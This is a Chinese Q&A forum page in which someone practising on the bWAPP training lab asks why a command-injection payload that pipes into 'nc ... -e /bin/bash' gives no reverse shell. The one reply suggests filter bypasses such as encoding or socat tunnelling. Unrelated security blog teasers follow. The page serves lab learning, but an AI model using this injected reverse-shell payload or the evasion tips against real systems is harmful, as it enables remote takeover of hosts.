在bwapp里使用127.0.0.1|nc 192.168.1.105 1234 -e /bin/bash语句
cmd已经打开这个端口的监听
但是收不到
如果只用127.0.0.1|nc 192.168.1.105 1234
cmd是可以收到的
有没有知道是什么原因的
1条回答 默认 最新
IT论之程序员 2023-07-11 21:14关注bwapp中nc命令可能被限制了,不能用于反向连接。
你可以试试以下方法:- 使用bwapp提供的nc替代版本,看看是否可以反向连接
- 使用其他端口转发工具,比如socat或reGeorg来进行端口转发,绕过nc限制
- 查看bwapp的文档,看是否有说明nc的使用限制,以及提供了哪些替代方案
- 尝试绕过系统 restriction,例如先将 bash 编码为十六进制等
- 使用其它协议进行反向连接,例如可以考虑 ssh 转发
总的来说,CTF和渗透测试平台都会对某些功能做限制,需要我们找到这些限制的边界并想办法绕过,这也是训练的一个重要方面。
解决 无用评论 打赏举报
分享
- 2023-09-18 20:22孤寂204的博客 ” 接下来的一页 讨论不设置SYN,RST,或者ACK位的报文发送到开放端口: “理论上,这不应该发生,如果您确实收到了,丢弃该报文,返回。甚至可以指定一个以逗号分隔的端口列表(如 -PS22,23,25,80,113,1050,...
- 2023-08-15 21:38程序员小肖的博客 本次测试仅供学习使用,如若非法他用,与平台和学习网络安全技术的...计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
- 2020-04-03 12:04一只小白来了的博客 </login><secret>blah</secret></reset> 2、各种协议的利用 SSRF中各个编程语言可以使用的协议如下图所示: 此处使用的合天网安实验室的一个靶场 1、file协议的利用 2、gopher协议的运用 gopher协议是比http协议更早...
- 2024-05-30 16:17白帽子凯哥的博客 因此,JavaScript 是 Internet 上的基本编程语言,被认为是最流行的脚本语言之一,因为大约 93% 的网站都由 Javascript 提供支持。这是由于它的一些功能,例如:容易学习。它有助于构建交互式WEB应用程序。是唯一...
- 2024-05-28 14:30AI大模型-搬运工的博客 由于本项目环境是nat模式需要项目IP地址,扫描挖掘本地的IP地址信息:image.png发现本kali ip为40段...可以看到有很多容易受到攻击的端口都开着,FTP、NetBIOS、MySQL和运行Web服务器(Apache HTTPD)的端口12380等等!
- 2024-05-06 18:15功城师的博客 网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络...从某种程度来讲,在网络安全领域,跟医生职业一样,越老越吃香,因为技术愈加成熟,自然工作会受到重视,升职加薪则是水到渠成之事。
- 2019-09-29 12:48weixin_30278237的博客 创建文件 touch test(后缀名可以先不写) echo 123 >test 将123写入test文件 重定向符号 查看文件内容: cat test 复制: cp 源文件位置 目标路径 移动: mv 源文件 目标路径 改名字:mv 原文件名 目标文件名 删...
- 没有解决我的问题, 去提问
问题事件
创建了问题
7月11日